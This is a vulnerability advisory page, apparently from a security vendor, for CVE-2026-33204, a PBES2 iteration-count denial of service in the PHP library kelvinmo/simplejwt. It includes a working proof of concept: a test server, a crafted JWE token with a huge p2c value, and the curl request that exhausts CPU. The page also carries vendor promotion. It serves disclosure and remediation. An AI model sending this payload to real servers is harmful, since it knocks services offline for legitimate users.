CVE-2026-33204

CVE-2026-33204 is a high-severity uncontrolled resource consumption vulnerability in kelvinmo/simplejwt (composer), affecting versions <= 1.1.0. It is fixed in 1.1.1.

Summary

An unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.
Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected.

Details

PHP version: PHP 8.4.11
SimpleJWT version: v1.1.0

The relevant portion of the vulnerable implementation is shown below (PBES2.php):

<?php
/* ... SNIP ... */
class PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {
    use AESKeyWrapTrait;

    /** @var array<string, mixed> $alg_params */
    static protected $alg_params = [
        'PBES2-HS256+A128KW' => ['hash' => 'sha256'],
        'PBES2-HS384+A192KW' => ['hash' => 'sha384'],
        'PBES2-HS512+A256KW' => ['hash' => 'sha512']
    ];

    /** @var truthy-string $hash_alg */
    protected $hash_alg;

    /** @var int $iterations */
    protected $iterations = 4096;
    
    /* ... SNIP ... */

    /**
     * Sets the number of iterations to use in PBKFD2 key generation.
     *
     * @param int $iterations number of iterations
     * @return void
     */
    public function setIterations(int $iterations) {
        $this->iterations = $iterations;
    }
    
    /* ... SNIP ... */

    /**
     * {@inheritdoc}
     */
    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {
        /** @var SymmetricKey $key */
        $key = $this->selectKey($keys, $kid);
        if ($key == null) {
            throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);
        }
        if (!isset($headers['p2s']) || !isset($headers['p2c'])) {
            throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);
        }

        $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);
        return $this->unwrapKey($encrypted_key, $derived_key, $headers);
    }
    
    /* ... SNIP ... */

    /**
     * @param array<string, mixed> $headers
     */
    private function generateKeyFromPassword(string $password, array $headers): string {
        $salt = $headers['alg'] . "\x00" . Util::base64url_decode($headers['p2s']);
        /** @var int<0, max> $length */
        $length = intdiv($this->getAESKWKeySize(), 8);

        return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);
    }
}
?>

The security flaw lies in the lack of input validation when handling JWEs that uses PBES2.
A "sanity ceiling" is not set on the iteration count, which is the parameter known in the JWE specification as p2c (RFC7518).
The library calls decryptKey() with the untrusted input $headers which then use the PHP function hash_pbkdf2() with the user-supplied value $headers['p2c'].

This results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.
Because the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.

Proof of Concept

Spin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.

mkdir simplejwt-poc
cd simplejwt-poc
composer install
composer require kelvinmo/simplejwt
php -S localhost:8000

The content of index.php:

<?php

require __DIR__ . '/vendor/autoload.php';

$set = SimpleJWT\Keys\KeySet::createFromSecret('secret123');

$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$method = $_SERVER['REQUEST_METHOD'];

if ($uri === '/encrypt' && $method === 'GET') {
    // Note $headers['alg'] and $headers['enc'] are required
    $headers = ['alg' => 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];
    $plaintext = 'This is the plaintext I want to encrypt.';
    $jwe = new SimpleJWT\JWE($headers, $plaintext);

    try {
        echo "Encrypted JWE: " . $jwe->encrypt($set);
    } catch (\RuntimeException $e) {
        echo $e;
    }
}

elseif ($uri === '/decrypt' && $method === 'GET') {
    try {
        $jwe = $_GET['s'];
        $jwe = SimpleJWT\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');
    } catch (SimpleJWT\InvalidTokenException $e) {
        echo $e;
    }
    echo $jwe->getHeader('alg') . "<br>";
    echo $jwe->getHeader('enc') . "<br>";
    echo $jwe->getPlaintext() . "<br>";
    }

else {
    http_response_code(404);
    echo "Route not found";
}

?>

We have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):

{
    "alg": "PBES2-HS256+A128KW",
    "enc": "A128CBC-HS256",
    "p2s": "blablabla",
    "p2c": 409123223136
}

The final JWE with poisoned header: eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla.

Notice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.

Perform the following request to the server (which tries to derive the PBES2 key):

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: localhost:8000' \
    $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'

The request blocks the worker until the PHP execution timeout is reached, shutting down the server:

[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started
[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted

Fatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168

Credits

Edoardo Ottavianelli (@edoardottt)

Impact

An attacker can send a crafted JWE with an extremely large p2c value to force the server to perform a very large number of PBKDF2 iterations.
This causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.
Repeated requests can exhaust server resources and make the application unavailable to legitimate users.

Crafted input forces the application to consume excessive CPU, memory, or other resources, degrading or denying service. Typical impact: denial of service.

CVE-2026-33204 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.1.1); upgrading removes the vulnerable code path.

Affected versions

kelvinmo/simplejwt (<= 1.1.0)

Security releases

kelvinmo/simplejwt → 1.1.1 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade kelvinmo/simplejwt to 1.1.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-33204? CVE-2026-33204 is a high-severity uncontrolled resource consumption vulnerability in kelvinmo/simplejwt (composer), affecting versions <= 1.1.0. It is fixed in 1.1.1. Crafted input forces the application to consume excessive CPU, memory, or other resources, degrading or denying service.
  2. How severe is CVE-2026-33204? CVE-2026-33204 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of kelvinmo/simplejwt are affected by CVE-2026-33204? kelvinmo/simplejwt (composer) versions <= 1.1.0 is affected.
  4. Is there a fix for CVE-2026-33204? Yes. CVE-2026-33204 is fixed in 1.1.1. Upgrade to this version or later.
  5. Is CVE-2026-33204 exploitable, and should I be worried? Whether CVE-2026-33204 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33204 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33204? Upgrade kelvinmo/simplejwt to 1.1.1 or later.

Other vulnerabilities in kelvinmo/simplejwt

Stop the waste.
Protect your environment with Kodem.